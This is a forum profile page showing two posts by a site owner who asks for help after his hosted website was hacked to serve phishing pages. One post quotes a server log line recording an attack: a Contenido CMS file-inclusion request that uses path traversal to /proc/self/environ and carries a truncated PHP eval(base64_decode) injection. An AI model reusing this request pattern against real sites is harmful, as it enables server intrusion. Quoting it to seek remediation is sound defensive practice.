Linux.com

MarkJeater

MarkJeater

  • Linux.com Member
  • Posts: 2
  • Member Since: 09 Jan 12
  • Last Logged In: 10 Jan 12

Latest Posts

Posted by
Topic
Post Preview
Posted
  • MarkJeater
    RE: My site has been used for Phishing
    Hi marc, I've been through the database and it doesn't appear to be a sql injection. More like an attack through Contenido CMS which we are not using but maybe installed as standard by FastHosts. But, I can't find out how to disable this? My main goal is to be able to tell FastHosts that the site cannot be attacked in this way again. Thanks
    Link to this post 10 Jan 12

    Hi marc,

    I've been through the database and it doesn't appear to be a sql injection.

    More like an attack through Contenido CMS which we are not using but maybe installed as standard by FastHosts.

    But, I can't find out how to disable this?

    My main goal is to be able to tell FastHosts that the site cannot be attacked in this way again.

    Thanks

  • MarkJeater
    My site has been used for Phishing
    Help please, I have a website that someone has been able to hack and install phishing pages! I need to set the security to make this impossible. Looking back in the logs I found this code snippet: "GET /index.php?page=latestnews//conlib/prepend.php3?cfg[path][contenido]=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 6578 "-" "
    Link to this post 09 Jan 12

    Help please,

    I have a website that someone has been able to hack and install phishing pages!

    I need to set the security to make this impossible. Looking back in the logs I found this code snippet:

    "GET /index.php?page=latestnews//conlib/prepend.php3?cfg[path][contenido]=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 6578 "-" "<?eval(base64_decode('

    After the page=latestnews there is a reference to conlib/prepend?cfg[path][contendido] which appears to install a page on the root directory from which they seem to be able to install phishing sites.

    I have several sites on a dedicated FastHosts server but only 1 is being attacked?

    Has anyone come across this and can recommend what to do?

    Thanks

    Mark

Who we are ?

The Linux Foundation is a non-profit consortium dedicated to the growth of Linux.

More About the foundation...

Frequent Questions

Join / Linux Training / Board